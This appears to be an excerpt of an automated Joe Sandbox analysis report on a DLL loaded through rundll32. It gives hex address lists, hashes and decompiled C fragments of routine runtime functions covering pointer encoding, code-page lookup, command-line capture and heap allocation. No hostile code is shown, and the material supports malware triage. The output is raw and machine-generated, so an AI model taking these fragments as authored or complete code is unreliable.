                                                      0x6e77a7e3
                                                      0x6e77a7e6
                                                      0x6e77a7e7
                                                      0x6e77a7e8
                                                      0x6e77a7e9
                                                      0x6e77a7ee
                                                      0x6e77a866
                                                      0x6e77a868
                                                      0x6e77a7f0
                                                      0x6e77a7f0
                                                      0x6e77a7f6
                                                      0x00000000
                                                      0x6e77a7f8
                                                      0x6e77a7fb
                                                      0x6e77a7fe
                                                      0x6e77a805
                                                      0x6e77a808
                                                      0x6e77a80c
                                                      0x6e77a83e
                                                      0x6e77a841
                                                      0x6e77a848
                                                      0x6e77a84e
                                                      0x6e77a858
                                                      0x6e77a861
                                                      0x6e77a861
                                                      0x6e77a858
                                                      0x6e77a84e
                                                      0x6e77a862
                                                      0x6e77a80e
                                                      0x6e77a80e
                                                      0x6e77a80e
                                                      0x6e77a811
                                                      0x6e77a811
                                                      0x6e77a815
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a819
                                                      0x6e77a82d
                                                      0x6e77a82d
                                                      0x6e77a81b
                                                      0x6e77a81b
                                                      0x6e77a821
                                                      0x00000000
                                                      0x6e77a823
                                                      0x6e77a823
                                                      0x6e77a826
                                                      0x6e77a82b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a82b
                                                      0x6e77a821
                                                      0x6e77a836
                                                      0x6e77a838
                                                      0x00000000
                                                      0x6e77a83a
                                                      0x6e77a83a
                                                      0x6e77a83a
                                                      0x00000000
                                                      0x6e77a838
                                                      0x6e77a831
                                                      0x6e77a833
                                                      0x00000000
                                                      0x6e77a833
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a7fe
                                                      0x6e77a7f6
                                                      0x6e77a869
                                                      0x6e77a86d
                                                      0x6e77a86d

                                                      APIs
                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E77A6CF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer
                                                      • String ID: MOC$RCC
                                                      • API String ID: 2118026453-2084237596
                                                      • Opcode ID: 5f9b276d5089230c5dfdf49e6b4545d236de110d8cac39fc7dcc2c8f85e9f966
                                                      • Instruction ID: dbef13744214e0a5b8b556ad04815abcc5643209144d2cb7d1c7610e664ca668
                                                      • Opcode Fuzzy Hash: 5f9b276d5089230c5dfdf49e6b4545d236de110d8cac39fc7dcc2c8f85e9f966
                                                      • Instruction Fuzzy Hash: F6415971900209AFEF15CFE4CA81AEEBBB9BF48304F158469F914A6221E335D951DF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E806350, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E8065F1,?,00000050,?,?,?,?,?), ref: 6E80642B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ACP$OCP
                                                      • API String ID: 0-711371036
                                                      • Opcode ID: c2b10d593f18d5da9859a82374be24d0d2989dbb5c2b85ebfccb265f858ab6a7
                                                      • Instruction ID: e79324b2ad0c32675ac58de2bba10226278b62af837600db1de6673272c4bcc2
                                                      • Opcode Fuzzy Hash: c2b10d593f18d5da9859a82374be24d0d2989dbb5c2b85ebfccb265f858ab6a7
                                                      • Instruction Fuzzy Hash: 15210862638516AAE7548FD4DE01BCB73AAAF40B65F434C14E905C7994EB32D981E3D0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7804AA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E7804AA() {

				 *0x6e78d330 = GetCommandLineA();
				 *0x6e78d334 = GetCommandLineW();
				return 1;
			}



                                                      0x6e7804b0
                                                      0x6e7804bb
                                                      0x6e7804c2

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CommandLine
                                                      • String ID: x+$
                                                      • API String ID: 3253501508-4023449922
                                                      • Opcode ID: 47b7315da2a597016d4b246720c2eb07f056634e2dab6c8f3385a02b40352599
                                                      • Instruction ID: 378864237042b7a58e0ec35217b890407e101a9b7d775082a3776a5a8ec764b1
                                                      • Opcode Fuzzy Hash: 47b7315da2a597016d4b246720c2eb07f056634e2dab6c8f3385a02b40352599
                                                      • Instruction Fuzzy Hash: 7CB092BCC61A00CFCF048F70F28D0063BADB23B6023A020BAE902C2B00D7B40000CF24
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7FFCB5, Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 6E7FFD4B
                                                      • GetLastError.KERNEL32 ref: 6E7FFD59
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 6E7FFDB4
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1717984340-0
                                                      • Opcode ID: 9fb9f7842fe2ff26eb58945d9d2434335944fd1a7d27d6de2ac5375459e5047c
                                                      • Instruction ID: 5cd62cceadefcee39d76df4a2d98b149efd4715588f64a4625dc09cf1eb0504b
                                                      • Opcode Fuzzy Hash: 9fb9f7842fe2ff26eb58945d9d2434335944fd1a7d27d6de2ac5375459e5047c
                                                      • Instruction Fuzzy Hash: 7541E631504707EFDB198FE9CA647AA7BB8AF02724F2041A9E864573B5EF318812CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E772C18, Relevance: 5.1, APIs: 4, Instructions: 69memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E772C18(intOrPtr __ecx, intOrPtr __edx, void** _a4, long* _a8) {
				signed int _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long* _v24;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t18;
				long _t30;
				void** _t36;
				void* _t44;
				signed int _t46;

				_t43 = __edx;
				_t18 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t18 ^ _t46;
				_t36 = _a4;
				_v24 = _a8;
				_t45 = 0;
				_v16 = __edx;
				_v20 = __ecx;
				_v12 = 0;
				_t9 = E6E77111C() + 0x1c; // 0x1c
				_t38 = _t9;
				if(E6E77220F(_t9, _t44, __ecx, __edx, __ecx, 0,  &_v12, __ecx, __ecx) != 0) {
					_t45 = HeapAlloc(GetProcessHeap(), 0, _v12);
					if(_t36 == 0) {
						goto L4;
					} else {
						_t14 = E6E77111C() + 0x1c; // 0x1c
						_t30 = E6E77220F(_t14, _t44, _v20, _v16, _t38, _t45,  &_v12, _t38, _t38);
						if(_t30 != 0) {
							 *_t36 = _t45;
							 *_v24 = _v12;
						} else {
							HeapFree(GetProcessHeap(), _t30, _t45);
							goto L4;
						}
					}
				}
				return E6E778727(_t36, _v8 ^ _t46, _t43, _t44, _t45);
			}
















                                                      0x6e772c18
                                                      0x6e772c1e
                                                      0x6e772c25
                                                      0x6e772c2c
                                                      0x6e772c32
                                                      0x6e772c35
                                                      0x6e772c3a
                                                      0x6e772c42
                                                      0x6e772c45
                                                      0x6e772c4d
                                                      0x6e772c4d
                                                      0x6e772c57
                                                      0x6e772c6a
                                                      0x6e772c6e
                                                      0x00000000
                                                      0x6e772c70
                                                      0x6e772c83
                                                      0x6e772c86
                                                      0x6e772c8d
                                                      0x6e772cb4
                                                      0x6e772cb6
                                                      0x6e772c8f
                                                      0x6e772c98
                                                      0x00000000
                                                      0x6e772c98
                                                      0x6e772c8d
                                                      0x6e772c6e
                                                      0x6e772cad

                                                      APIs
                                                        • Part of subcall function 6E77111C: __EH_prolog3.LIBCMT ref: 6E771123
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 6E772C5D
                                                      • HeapAlloc.KERNEL32(00000000), ref: 6E772C64
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E772C91
                                                      • HeapFree.KERNEL32(00000000), ref: 6E772C98
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocFreeH_prolog3
                                                      • String ID:
                                                      • API String ID: 2654106454-0
                                                      • Opcode ID: 499910738e700f56e69e88fbcc60a31dac9ee2c76a8eb6323280ec96f2149b03
                                                      • Instruction ID: a8b6d9c22263a37c8a130345d1683e253ff5d908c15f214658209cc0fd50b307
                                                      • Opcode Fuzzy Hash: 499910738e700f56e69e88fbcc60a31dac9ee2c76a8eb6323280ec96f2149b03
                                                      • Instruction Fuzzy Hash: D21129B5910218AFDF14DFE5EE489EFBBBCEF1A240B114579B416E7110EB309A00CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%